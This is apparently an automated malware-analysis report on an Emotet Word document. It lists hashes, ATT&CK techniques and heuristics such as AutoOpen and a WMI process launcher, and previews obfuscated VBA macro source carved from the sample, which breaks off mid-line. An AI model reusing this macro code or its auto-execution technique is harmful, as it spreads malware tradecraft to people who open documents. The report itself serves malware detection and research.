Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4b37aca0d46401d6…

MALICIOUS

Office (OLE)

189.8 KB Created: 2019-04-30 16:40:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: c9c89bed40ac38d7c622f7de2215b2db SHA-1: 55001684dc7bc5912cc636264bbfc2bf5b006a0a SHA-256: 4b37aca0d46401d67a57677fc4189ef354ec63afa9c3312cd076fbe0391b9c6d
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros with an autoopen function, which is a common technique for Emotet. The critical heuristic 'OLE_VBA_WMI_PROCESS_CREATE' indicates the macro attempts to launch a process via WMI. ClamAV detection also confirms the Emotet family. The macro's intent is to execute a malicious payload, likely a downloader, using the WMI Win32_Process launcher.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-6959697-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6959697-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39898 bytes
SHA-256: f435de1a2d16c5d3d2211aaf9167d2424af8f793a1404dd26ac8ebade68693ac
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VUAxAUA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jk1DADB"
Attribute VB_Base = "0{C3FB2FD9-D262-45DF-ADA5-7A9824370E19}{24809B5E-DCB4-43F8-9A31-91FC17A235C5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MkGCQ_A"
Attribute VB_Base = "0{3B807447-38EA-4C8F-B056-DD128D073012}{5C86DE9C-55C5-490E-8366-A3885513EC97}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "n1cUGBoA"
Sub autoopen()
   If SABQB4w1 = wAAG1cAo Then
ElseIf VAAAAc = sAUADQAA Then
            SABAUB = Hex(GDAUA4wo + CSng(uBAoQB / Tan(438172782 + 170242108)))
ElseIf XUxAAAQ = nA4AxB_ Then
            jkX_1DA = Atn(189295002) + Int(190766013)
ElseIf AwAGDA = OkADAAZ Then
            vAxA1c = 482445094 + Atn(33888895)
End If
   If oA11xC = cBZBQABG Then
ElseIf tUAQAAGU = wAQX_ADc Then
            MCA1wxU = Hex(bkB_AcC + CSng(JAAAAA / Tan(781555846 + 296431849)))
ElseIf E4ABU_ = aCBUABAU Then
            oBwQAD = Atn(814582981) + Int(991437317)
ElseIf uAQAXUAA = Wc1AAC Then
            wAAGoGZ = 963156523 + Atn(80418687)
End If
QQXDkoAU
   If mAAAAwD = QUAB1_ Then
ElseIf sA4GBA = OUXQAABx Then
            IXZcoQAA = Hex(jAXcoA + CSng(TBA14Q_B / Tan(923817426 + 856469621)))
ElseIf tQkA1AA = EBGoGA Then
            JGQQkA = Atn(886063269) + Int(520724521)
ElseIf lZx4C4A = hQUAQwGA Then
            VCQA4AA = 511509469 + Atn(638073167)
End If
   If JkAQAxAD = sQ4o4_ Then
ElseIf DkG_BB = hA41cD Then
            fX_1AAAB = Hex(wxxAUAo + CSng(UXU1AAw / Tan(388706764 + 857595971)))
ElseIf O_oA1AcA = JBGXAA Then
            i1AAAw4A = Atn(892239837) + Int(163003856)
ElseIf bDDoD_k = zAADAwD Then
            iDwGXA = 471114384 + Atn(838904434)
End If
   If icAQBBcA = NBA_ABA Then
ElseIf QAAABC = dDBAGAZA Then
            OQ_BcA4 = Hex(ukAAUBc + CSng(rBDBAGA / Tan(446230014 + 728525395)))
ElseIf dAkADcw = SXAAACAQ Then
            OUDxZA = Atn(130852837) + Int(436533196)
ElseIf GQAkQCcx = W4AUkAAA Then
            wGAQwoZA = 625532876 + Atn(583301602)
End If
End Sub
Function iAAAxAXA(SUUxA_)
   If bkxAAB = iAAc_BQA Then
ElseIf D1UABAAA = iBCBUoA Then
            VA1Z_Q4A = Hex(q1QBocDA + CSng(FAAUZAQ / Tan(951505267 + 318798705)))
ElseIf fQAAXQA = zBUcDkkc Then
            QAAXGADo = Atn(998653389) + Int(333961660)
ElseIf mAXXQZD = OwU4AA Then
            SxQoAA = 182825331 + Atn(563396236)
End If
   If EDZAGA = RkDwBXA Then
ElseIf wAAGAXD = KkxAADwZ Then
            LAA4_1A = Hex(lA4AUA1 + CSng(UAAUAA / Tan(586807075 + 247227732)))
ElseIf YAcA4A = kBGDoAG Then
            fB1wAkx = Atn(116682791) + Int(422009753)
ElseIf IZxwABCA = z_Q14k Then
            NAA1wc = 395511735 + Atn(187258439)
End If
   If PAADCB = fAkCAQG_ Then
ElseIf pUUA4A = CDQ_4w Then
            NcDDAA = Hex(CkC_XA + CSng(kxAQUZA / Tan(497684038 + 447605628)))
ElseIf lAkAokA = ToAQcGA_ Then
            AAAxQB = Atn(503560580) + Int(289790292)
ElseIf r4ABAcQC = SA1QAA Then
            cUAG41 = 719057046 + Atn(273784545)
End If
Set iAAAxAXA = CVar(SUUxA_)
   If AAcACCB = QAAAwwwU Then
ElseIf uAQB1GGA = wcxkCAc Then
            uD114A = Hex(wQZABxA + CSng(McUZA1U / Tan(230903026 + 975394436)))
ElseIf QUAAAQ = jCXUXxA Then
            KUc1Q4Bx = Atn(467151942) + Int(696460796)
ElseIf sDAAcDQA = ACAUUA Then
            ZQAZA4D = 836423984 + Atn(534068302)
End If
   If bAA1DUB = CB_AABX Then
ElseIf FUAAAUAX = qDADAQ Then
            cAxQAxAA = Hex(PwUAocDB + CSng(zAZXAQ / Tan(690262104 + 350899247)))
ElseIf OkAGAwU = MU
... (truncated)